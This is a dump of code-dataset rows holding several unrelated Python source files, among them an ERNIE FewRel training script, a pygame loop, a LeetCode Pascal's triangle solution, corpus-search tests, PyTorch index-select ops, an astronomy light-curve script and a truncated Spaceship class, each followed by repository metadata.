def convert_examples_to_features(examples, label_list, max_seq_length, tokenizer, threshold):
"""Loads a data file into a list of `InputBatch`s."""
label_list = sorted(label_list)
label_map = {label : i for i, label in enumerate(label_list)}
entity2id = {}
with open("kg_embed/entity2id.txt") as fin:
fin.readline()
for line in fin:
qid, eid = line.strip().split('\t')
entity2id[qid] = int(eid)
features = []
for (ex_index, example) in enumerate(examples):
ex_text_a = example.text_a[0]
h, t = example.text_a[1]
h_name = ex_text_a[h[1]:h[2]]
t_name = ex_text_a[t[1]:t[2]]
if h[1] < t[1]:
ex_text_a = ex_text_a[:h[1]] + "# "+h_name+" #" + ex_text_a[h[2]:t[1]] + "$ "+t_name+" $" + ex_text_a[t[2]:]
else:
ex_text_a = ex_text_a[:t[1]] + "$ "+t_name+" $" + ex_text_a[t[2]:h[1]] + "# "+h_name+" #" + ex_text_a[h[2]:]
if h[1] < t[1]:
h[1] += 2
h[2] += 2
t[1] += 6
t[2] += 6
else:
h[1] += 6
h[2] += 6
t[1] += 2
t[2] += 2
tokens_a, entities_a = tokenizer.tokenize(ex_text_a, [h, t])
if len([x for x in entities_a if x!="UNK"]) != 2:
print(entities_a, len([x for x in entities_a if x[0]!="UNK"]))
exit(1)
tokens_b = None
if example.text_b:
tokens_b, entities_b = tokenizer.tokenize(example.text_b[0], [x for x in example.text_b[1] if x[-1]>threshold])
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
_truncate_seq_pair(tokens_a, tokens_b, entities_a, entities_b, max_seq_length - 3)
else:
# Account for [CLS] and [SEP] with "- 2"
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[:(max_seq_length - 2)]
entities_a = entities_a[:(max_seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambigiously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
ents = ["UNK"] + entities_a + ["UNK"]
segment_ids = [0] * len(tokens)
if tokens_b:
tokens += tokens_b + ["[SEP]"]
ents += entities_b + ["UNK"]
segment_ids += [1] * (len(tokens_b) + 1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
input_ent = []
ent_mask = []
for ent in ents:
if ent != "UNK" and ent in entity2id:
input_ent.append(entity2id[ent])
ent_mask.append(1)
else:
input_ent.append(-1)
ent_mask.append(0)
ent_mask[0] = 1
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
padding = [0] * (max_seq_length - len(input_ids))
padding_ = [-1] * (max_seq_length - len(input_ids))
input_ids += padding
input_mask += padding
segment_ids += padding
input_ent += padding_
ent_mask += padding
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(input_ent) == max_seq_length
assert len(ent_mask) == max_seq_length
label_id = label_map[example.label]
if ex_index < 5:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join(
[str(x) for x in tokens]))
logger.info("ents: %s" % " ".join(
[str(x) for x in ents]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
logger.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
logger.info("label: %s (id = %d)" % (example.label, label_id))
features.append(
InputFeatures(input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
input_ent=input_ent,
ent_mask=ent_mask,
label_id=label_id))
return features
def _truncate_seq_pair(tokens_a, tokens_b, ents_a, ents_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
ents_a.pop()
else:
tokens_b.pop()
ents_b.pop()
def accuracy(out, labels):
outputs = np.argmax(out, axis=1)
return np.sum(outputs == labels)
def warmup_linear(x, warmup=0.002):
if x < warmup:
return x/warmup
return 1.0
def main():
parser = argparse.ArgumentParser()
## Required parameters
parser.add_argument("--data_dir",
default=None,
type=str,
required=True,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.")
parser.add_argument("--ernie_model", default=None, type=str, required=True,
help="Ernie pre-trained model")
parser.add_argument("--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.")
## Other parameters
parser.add_argument("--max_seq_length",
default=128,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--do_train",
default=False,
action='store_true',
help="Whether to run training.")
parser.add_argument("--do_eval",
default=False,
action='store_true',
help="Whether to run eval on the dev set.")
parser.add_argument("--do_lower_case",
default=False,
action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--train_batch_size",
default=32,
type=int,
help="Total batch size for training.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs",
default=3.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
parser.add_argument("--no_cuda",
default=False,
action='store_true',
help="Whether not to use CUDA when available")
parser.add_argument("--local_rank",
type=int,
default=-1,
help="local_rank for distributed training on gpus")
parser.add_argument('--seed',
type=int,
default=42,
help="random seed for initialization")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument('--fp16',
default=False,
action='store_true',
help="Whether to use 16-bit float precision instead of 32-bit")
parser.add_argument('--loss_scale',
type=float, default=0,
help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
"0 (default value): dynamic loss scaling.\n"
"Positive power of 2: static loss scaling value.\n")
parser.add_argument('--threshold', type=float, default=.3)
args = parser.parse_args()
processors = FewrelProcessor
num_labels_task = 80
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
n_gpu = torch.cuda.device_count()
else:
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
n_gpu = 1
# Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.distributed.init_process_group(backend='nccl')
logger.info("device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}".format(
device, n_gpu, bool(args.local_rank != -1), args.fp16))
if args.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
args.gradient_accumulation_steps))
args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
if not args.do_train:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
raise ValueError("Output directory ({}) already exists and is not empty.".format(args.output_dir))
os.makedirs(args.output_dir, exist_ok=True)
processor = processors()
num_labels = num_labels_task
label_list = None
tokenizer = BertTokenizer.from_pretrained(args.ernie_model, do_lower_case=args.do_lower_case)
train_examples = None
num_train_steps = None
train_examples, label_list = processor.get_train_examples(args.data_dir)
num_train_steps = int(
len(train_examples) / args.train_batch_size / args.gradient_accumulation_steps * args.num_train_epochs)
# Prepare model
model, _ = BertForSequenceClassification.from_pretrained(args.ernie_model,
cache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(args.local_rank),
num_labels = num_labels)
if args.fp16:
model.half()
model.to(device)
if args.local_rank != -1:
try:
from apex.parallel import DistributedDataParallel as DDP
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
model = DDP(model)
elif n_gpu > 1:
model = torch.nn.DataParallel(model)
# Prepare optimizer
param_optimizer = list(model.named_parameters())
no_grad = ['bert.encoder.layer.11.output.dense_ent', 'bert.encoder.layer.11.output.LayerNorm_ent']
param_optimizer = [(n, p) for n, p in param_optimizer if not any(nd in n for nd in no_grad)]
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
t_total = num_train_steps
if args.local_rank != -1:
t_total = t_total // torch.distributed.get_world_size()
if args.fp16:
try:
from apex.optimizers import FP16_Optimizer
from apex.optimizers import FusedAdam
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
optimizer = FusedAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
bias_correction=False,
max_grad_norm=1.0)
if args.loss_scale == 0:
optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
else:
optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
else:
optimizer = BertAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
warmup=args.warmup_proportion,
t_total=t_total)
global_step = 0
if args.do_train:
train_features = convert_examples_to_features(
train_examples, label_list, args.max_seq_length, tokenizer, args.threshold)
vecs = []
vecs.append([0]*100)
with open("kg_embed/entity2vec.vec", 'r') as fin:
for line in fin:
vec = line.strip().split('\t')
vec = [float(x) for x in vec]
vecs.append(vec)
embed = torch.FloatTensor(vecs)
embed = torch.nn.Embedding.from_pretrained(embed)
#embed = torch.nn.Embedding(5041175, 100)
logger.info("Shape of entity embedding: "+str(embed.weight.size()))
del vecs
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_examples))
logger.info(" Batch size = %d", args.train_batch_size)
logger.info(" Num steps = %d", num_train_steps)
all_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)
all_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)
all_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)
all_label_ids = torch.tensor([f.label_id for f in train_features], dtype=torch.long)
all_ent = torch.tensor([f.input_ent for f in train_features], dtype=torch.long)
all_ent_masks = torch.tensor([f.ent_mask for f in train_features], dtype=torch.long)
train_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_ent, all_ent_masks, all_label_ids)
if args.local_rank == -1:
train_sampler = RandomSampler(train_data)
else:
train_sampler = DistributedSampler(train_data)
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)
output_loss_file = os.path.join(args.output_dir, "loss")
loss_fout = open(output_loss_file, 'w')
model.train()
for _ in trange(int(args.num_train_epochs), desc="Epoch"):
tr_loss = 0
nb_tr_examples, nb_tr_steps = 0, 0
for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
batch = tuple(t.to(device) if i != 3 else t for i, t in enumerate(batch))
input_ids, input_mask, segment_ids, input_ent, ent_mask, label_ids = batch
input_ent = embed(input_ent+1).to(device) # -1 -> 0
loss = model(input_ids, segment_ids, input_mask, input_ent.half(), ent_mask, label_ids)
if n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu.
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
optimizer.backward(loss)
else:
loss.backward()
loss_fout.write("{}\n".format(loss.item()))
tr_loss += loss.item()
nb_tr_examples += input_ids.size(0)
nb_tr_steps += 1
if (step + 1) % args.gradient_accumulation_steps == 0:
# modify learning rate with special warm up BERT uses
lr_this_step = args.learning_rate * warmup_linear(global_step/t_total, args.warmup_proportion)
for param_group in optimizer.param_groups:
param_group['lr'] = lr_this_step
optimizer.step()
optimizer.zero_grad()
global_step += 1
model_to_save = model.module if hasattr(model, 'module') else model
output_model_file = os.path.join(args.output_dir, "pytorch_model.bin_{}".format(global_step))
torch.save(model_to_save.state_dict(), output_model_file)
# Save a trained model
model_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self
output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
torch.save(model_to_save.state_dict(), output_model_file)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
bfdfc1a62852507f68a014cbcc9ad012b1f7e16e | 9139bd5dad2c66f070d1eb01958a11a2af1c9835 | /game-again.py | 224f4ce078f24c31bd6fed0be854de5fba7b5cf7 | [] | no_license | anmolrajaroraa/python-reg-oct | 7223487b864d969e89f9daae2a77522405977f27 | acb62ad7c8acb78f348bdc47e5ed6230808d967c | refs/heads/master | 2020-08-04T09:10:25.152732 | 2019-11-08T08:57:28 | 2019-11-08T08:57:28 | 212,085,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | import pygame
pygame.init()
HEIGHT = 500
WIDTH = 1000
# red green blue (0-255)
BLACK = 0,0,0
WHITE = 255,255,255
RED = 255,0,0
RANDOM_COLOR = 100,150,200
gameboard = pygame.display.set_mode((WIDTH,HEIGHT))
while True:
print("!")
gameboard.fill( BLACK )
pygame.display.update( )
| [
"[email protected]"
] | |
20ede17c952b40d8bfe9406df93dd193f5dceb68 | b4ddc954a7dc0d24352de64a567c10c9e7231eee | /LeetCode/Pascal_Triangle.py | 19ffa5bc0886c62656dc9045ad7221ae44c9f5e0 | [] | no_license | sharadbhat/Competitive-Coding | 4d80c99093bf05a2213799c95467309cf3e40d07 | 79eec04cc6b1ac69295530bda1575ecb613a769e | refs/heads/master | 2023-07-05T02:25:33.397140 | 2023-06-27T05:38:12 | 2023-06-27T05:38:12 | 78,031,600 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # LeetCode
# https://leetcode.com/problems/pascals-triangle/description/
class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
if numRows == 0:
return []
l = [[1]]
for i in range(1, numRows):
k = [1]
for j in range(1, i):
k.append(l[i - 1][j - 1] + l[i - 1][j])
k.append(1)
l.append(k)
return l
| [
"[email protected]"
] | |
ba79f0a7a16eee2f5d086bd7d5e06adec8636825 | f10d45aecbfccb3f469ab0c4ae55fc0f256c9004 | /Functions/chr_ord.py | 80c8745e0e21329911e636eedb326846d34957cc | [] | no_license | Do-code-ing/Python_Built-ins | c34c1cea19a2cef80ab3a16d050e8825af0feb59 | 03b2f277acde4fce00bb521e3a0b8c0469b39879 | refs/heads/master | 2023-07-29T15:30:00.693005 | 2021-09-04T18:48:18 | 2021-09-04T18:48:18 | 354,467,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | # chr(i) : character(int)
# 유니코드 포인트 정수 값을 입력하면 해당 정수 값의 유니코드 문자열을 반환한다.
# i 가 0 ~ 1,114,111(16진수로 0x10FFFF)를 벗어나면 'ValueError'가 발생한다.
# 정수를 문자로
print(chr(8364))
# '€'
# ord(c) : ordinary character(character)
# 유니코드 문자열이 주어지면 해당 문자의 유니코드 코드 포인트 정수 값을 반환한다.
# chr() 와 반대로 작동한다.
# 문자를 정수로
print(ord("€"))
# 8364 | [
"[email protected]"
] | |
ea0d2d7415c8d98590a6caf8cc4bb1aa659fd24e | 1457bf059b94e04d4d512012b28a924167c68938 | /NetworkBehaviour/Basics/Normalization_Sparse.py | 164188463a9a59cb81bc31b3411633742dab0ba2 | [] | no_license | YaminaDJOUDI/PymoNNto | e063c81547d41a9841ff8f8071c4d6347ce792da | 807aa7e0ba38cb29ad7839b39f29752da00eee78 | refs/heads/master | 2023-07-08T03:06:41.722292 | 2021-08-04T11:30:52 | 2021-08-04T11:30:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 850 | py | import numpy as np
scipy.sparse
def normalize_synapse_attr_sparse(src_attr, target_attr, target_value, neurons, synapse_type):
neurons.temp_weight_sum = neurons.get_neuron_vec()
for s in neurons.afferent_synapses[synapse_type]:
if 'sparse' in s.tags:
s.dst.temp_weight_sum += np.array(getattr(s, src_attr).sum(1)).flatten()
else:
s.dst.temp_weight_sum += np.sum(getattr(s, src_attr), axis=1)
neurons.temp_weight_sum /= target_value
for s in neurons.afferent_synapses[synapse_type]:
if 'sparse' in s.tags:
W = getattr(s, target_attr)
W.data /= np.array(neurons.temp_weight_sum[W.indices]).reshape(W.data.shape)
else:
setattr(s, target_attr, getattr(s, target_attr) / (s.dst.temp_weight_sum[:, None]+(s.dst.temp_weight_sum[:, None]==0)))
| [
"[email protected]"
] | |
e0af98a161bb2fe76f40a9dab414307691aed916 | cdecfcc56973ae143f04a9e92225c5fc90a052ab | /tracing/tracing/value/diagnostics/reserved_infos.py | 13aedf28520e992994fa0efa641eba6d7f919036 | [
"BSD-3-Clause"
] | permissive | eugenesavenko/catapult | 8e43adab9a4650da4e8e1860f3b9b49936955aae | f2ad70de40a8f739438d89b0c8d5ed6509b3cbe6 | refs/heads/master | 2021-05-05T17:31:51.483972 | 2017-09-13T15:10:56 | 2017-09-13T15:10:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,662 | py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class _Info(object):
def __init__(self, name, _type=None, entry_type=None):
self._name = name
self._type = _type
if entry_type is not None and self._type != 'GenericSet':
raise ValueError(
'entry_type should only be specified if _type is GenericSet')
self._entry_type = entry_type
@property
def name(self):
return self._name
@property
def type(self):
return self._type
@property
def entry_type(self):
return self._entry_type
ANGLE_REVISIONS = _Info('angleRevisions', 'GenericSet', str)
ARCHITECTURES = _Info('architectures', 'GenericSet', str)
BENCHMARKS = _Info('benchmarks', 'GenericSet', str)
BENCHMARK_START = _Info('benchmarkStart', 'DateRange')
BOTS = _Info('bots', 'GenericSet', str)
BUG_COMPONENTS = _Info('bugComponents', 'GenericSet', str)
BUILDS = _Info('builds', 'GenericSet', int)
CATAPULT_REVISIONS = _Info('catapultRevisions', 'GenericSet', str)
CHROMIUM_COMMIT_POSITIONS = _Info('chromiumCommitPositions', 'GenericSet', int)
CHROMIUM_REVISIONS = _Info('chromiumRevisions', 'GenericSet', str)
GPUS = _Info('gpus', 'GenericSet', str)
GROUPING_PATH = _Info('groupingPath')
LABELS = _Info('labels', 'GenericSet', str)
LOG_URLS = _Info('logUrls', 'GenericSet', str)
MASTERS = _Info('masters', 'GenericSet', str)
MEMORY_AMOUNTS = _Info('memoryAmounts', 'GenericSet', int)
MERGED_FROM = _Info('mergedFrom', 'RelatedHistogramMap')
MERGED_TO = _Info('mergedTo', 'RelatedHistogramMap')
OS_NAMES = _Info('osNames', 'GenericSet', str)
OS_VERSIONS = _Info('osVersions', 'GenericSet', str)
OWNERS = _Info('owners', 'GenericSet', str)
PRODUCT_VERSIONS = _Info('productVersions', 'GenericSet', str)
RELATED_NAMES = _Info('relatedNames', 'GenericSet', str)
SKIA_REVISIONS = _Info('skiaRevisions', 'GenericSet', str)
STORIES = _Info('stories', 'GenericSet', str)
STORYSET_REPEATS = _Info('storysetRepeats', 'GenericSet', int)
STORY_TAGS = _Info('storyTags', 'GenericSet', str)
TAG_MAP = _Info('tagmap', 'TagMap')
TRACE_START = _Info('traceStart', 'DateRange')
TRACE_URLS = _Info('traceUrls', 'GenericSet', str)
V8_COMMIT_POSITIONS = _Info('v8CommitPositions', 'DateRange')
V8_REVISIONS = _Info('v8Revisions', 'GenericSet', str)
WEBRTC_REVISIONS = _Info('webrtcRevisions', 'GenericSet', str)
def GetTypeForName(name):
for info in globals().itervalues():
if isinstance(info, _Info) and info.name == name:
return info.type
def AllInfos():
for info in globals().itervalues():
if isinstance(info, _Info):
yield info
| [
"[email protected]"
] | |
286e5a84629ddfa8a87808ef1f9d99445655a7e5 | 7e79ca343d8d3246fc783161673550f6e4ae8896 | /tests/test_search.py | 73b1bddf6e9c87215ffb0554d6c68407a13132a2 | [
"MIT"
] | permissive | interrogator/buzz | 5ba0907115aa29efc24f016d1345a0371b91350a | 7627b8ce4a286f65388f0825487441df00055b39 | refs/heads/master | 2023-04-02T03:18:01.691139 | 2020-11-19T12:00:21 | 2020-11-19T12:00:21 | 163,623,092 | 42 | 2 | MIT | 2023-03-25T00:51:45 | 2018-12-30T22:55:18 | Python | UTF-8 | Python | false | false | 2,544 | py | import unittest
from buzz.corpus import Corpus
class TestSearch(unittest.TestCase):
@classmethod
def setUpClass(cls):
""" get_some_resource() is slow, to avoid calling it for each test use setUpClass()
and store the result as class variable
"""
super().setUpClass()
cls.parsed = Corpus("tests/testing-parsed")
cls.loaded = cls.parsed.load()
def test_non_loaded(self):
# todo: find out why .equals isn't the same.
res = self.parsed.depgrep("w/book/ = x/NOUN/")
lres = self.loaded.depgrep("w/book/ = x/NOUN/")
self.assertEqual(len(res), 3)
self.assertTrue(list(res._n) == list(lres._n))
res = self.parsed.depgrep("l/book/")
lres = self.loaded.depgrep("l/book/")
self.assertEqual(len(res), 6)
self.assertTrue(list(res.index) == list(lres.index))
self.assertTrue(list(res._n) == list(lres._n))
def test_bigrams(self):
j = self.loaded.just.words("(?i)jungle")
self.assertEqual(len(j), 6)
big = self.loaded.bigrams.depgrep("l/jungle/", from_reference=True).table(
show=["x"]
)
self.assertTrue("punct" in big.columns)
self.assertEqual(big.shape[1], 5)
no_punct = self.loaded.skip.wordclass.PUNCT
big = no_punct.bigrams.lemma("jungle", from_reference=False).table(show=["x"])
self.assertFalse("punct" in big.columns)
self.assertEqual(big.shape[1], 3)
def test_depgrep(self):
res = self.loaded.depgrep("L/book/")
self.assertEqual(len(res), 3)
res = self.loaded.depgrep('x/^NOUN/ -> l"the"', case_sensitive=False)
sup = self.loaded.depgrep('p/^N/ -> l"the"', case_sensitive=False)
# sup is a superset of res
self.assertTrue(all(i in sup.index for i in res.index))
self.assertEqual(len(sup), 28)
self.assertEqual(len(res), 24)
self.assertTrue((res.x == "NOUN").all())
# let us check this manually
# get all rows whose lemma is 'the'
the = self.loaded[self.loaded["l"] == "the"]
count = 0
# iterate over rows, get governor of the, lookup this row.
# if row is a noun, check that its index is in our results
for (f, s, _), series in the.T.items():
gov = series["g"]
gov = self.loaded.loc[f, s, gov]
if gov.x == "NOUN":
self.assertTrue(gov.name in res.index)
count += 1
self.assertEqual(count, len(res))
| [
"[email protected]"
] | |
de198265ca023fde36b1896bd7f7a3c4b83a552d | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /bigg/bigg/torch_ops/tensor_ops.py | 9f544ab7efd4d3e2c752d63f5d72056f16c23cef | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 3,956 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: skip-file
import torch
from torch.nn import Module
from torch.nn.parameter import Parameter
from torch.autograd import Function
import numpy as np
from bigg.common.consts import t_float
class MultiIndexSelectFunc(Function):
@staticmethod
def forward(ctx, idx_froms, idx_tos, *mats):
assert len(idx_tos) == len(idx_froms) == len(mats)
cols = mats[0].shape[1]
assert all([len(x.shape) == 2 for x in mats])
assert all([x.shape[1] == cols for x in mats])
num_rows = sum([len(x) for x in idx_tos])
out = mats[0].new(num_rows, cols)
for i, mat in enumerate(mats):
x_from = idx_froms[i]
x_to = idx_tos[i]
if x_from is None:
out[x_to] = mat.detach()
else:
assert len(x_from) == len(x_to)
out[x_to] = mat[x_from].detach()
ctx.idx_froms = idx_froms
ctx.idx_tos = idx_tos
ctx.shapes = [x.shape for x in mats]
return out
@staticmethod
def backward(ctx, grad_output):
idx_froms, idx_tos = ctx.idx_froms, ctx.idx_tos
list_grad_mats = [None, None]
for i in range(len(idx_froms)):
x_from = idx_froms[i]
x_to = idx_tos[i]
if x_from is None:
grad_mat = grad_output[x_to].detach()
else:
grad_mat = grad_output.new(ctx.shapes[i]).zero_()
grad_mat[x_from] = grad_output[x_to].detach()
list_grad_mats.append(grad_mat)
return tuple(list_grad_mats)
class MultiIndexSelect(Module):
def forward(self, idx_froms, idx_tos, *mats):
return MultiIndexSelectFunc.apply(idx_froms, idx_tos, *mats)
multi_index_select = MultiIndexSelect()
def test_multi_select():
a = Parameter(torch.randn(4, 2))
b = Parameter(torch.randn(3, 2))
d = Parameter(torch.randn(5, 2))
idx_froms = [[0, 1], [1, 2], [3, 4]]
idx_tos = [[4, 5], [0, 1], [2, 3]]
c = multi_index_select(idx_froms, idx_tos, a, b, d)
print('===a===')
print(a)
print('===b===')
print(b)
print('===d===')
print(d)
print('===c===')
print(c)
t = torch.sum(c)
t.backward()
print(a.grad)
print(b.grad)
print(d.grad)
class PosEncoding(Module):
def __init__(self, dim, device, base=10000, bias=0):
super(PosEncoding, self).__init__()
p = []
sft = []
for i in range(dim):
b = (i - i % 2) / dim
p.append(base ** -b)
if i % 2:
sft.append(np.pi / 2.0 + bias)
else:
sft.append(bias)
self.device = device
self.sft = torch.tensor(sft, dtype=t_float).view(1, -1).to(device)
self.base = torch.tensor(p, dtype=t_float).view(1, -1).to(device)
def forward(self, pos):
with torch.no_grad():
if isinstance(pos, list):
pos = torch.tensor(pos, dtype=t_float).to(self.device)
pos = pos.view(-1, 1)
x = pos / self.base + self.sft
return torch.sin(x)
if __name__ == '__main__':
# test_multi_select()
pos_enc = PosEncoding(128, 'cpu')
print(pos_enc([1, 2, 3]))
| [
"[email protected]"
] | |
b7b026f7642d82363d9802fe0d817ba66118aad4 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/ec_11022-1357/sdB_EC_11022-1357_lc.py | 350257c414f2078d50e83da141fccc17f22aa32c | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[166.190667,-14.236356], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_EC_11022-1357 /sdB_EC_11022-1357_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
0bd82e74ba3c6621cb7fa14b9f43311bc864df59 | 3a28b1a12d0710c06f6360381ad8be6cf3707907 | /modular_model/triHPC/triHPCThermo/HPCAllTrays23CstmVapN2.py | b31256787ee26b7321199ab3098b7e3d1d66394a | [] | no_license | WheatZhang/DynamicModelling | 6ce1d71d3b55176fd4d77a6aedbaf87e25ce4d02 | ea099245135fe73e8c9590502b9c8b87768cb165 | refs/heads/master | 2020-06-15T14:12:50.373047 | 2019-07-05T01:37:06 | 2019-07-05T01:37:06 | 195,319,788 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | def VapN2(P,T,x_N2):
x = (P-5.50184878e+02)/3.71707400e-01
y = (T--1.77763832e+02)/1.81029000e-02
z = (x_N2-9.82420040e-01)/2.44481265e-03
output = \
1*-8.60567815e-01+\
z*1.86073097e+00+\
y*8.60696199e-01+\
x*-4.21414345e-01
y_N2 = output*1.31412243e-03+9.90969573e-01
return y_N2 | [
"[email protected]"
] | |
7a09c2d76104f8dd348cfb5c054d8ed6d565d3e1 | b212ec9d705fb77cac102dceb12eb668099fd1ae | /oop/exams/december_2020/tests/project/spaceship/spaceship.py | 0defe638ec725097b266e2afa6f7fdba3fb197b5 | [] | no_license | xpucko/Software-University-SoftUni | 20ef91a0be91a8a09a56d9fdc15888f91409de2f | a1fc1781424f025954948299be7f75d317e32dc1 | refs/heads/master | 2023-02-04T11:58:33.068431 | 2020-12-24T00:39:11 | 2020-12-24T00:39:11 | 280,227,310 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,052 | py | class Spaceship:
SPACESHIP_FULL = "Spaceship is full"
ASTRONAUT_EXISTS = "Astronaut {} Exists"
ASTRONAUT_NOT_FOUND = "Astronaut Not Found"
ASTRONAUT_ADD = "Added astronaut {}"
ASTRONAUT_REMOVED = "Removed {}"
ZERO_CAPACITY = 0
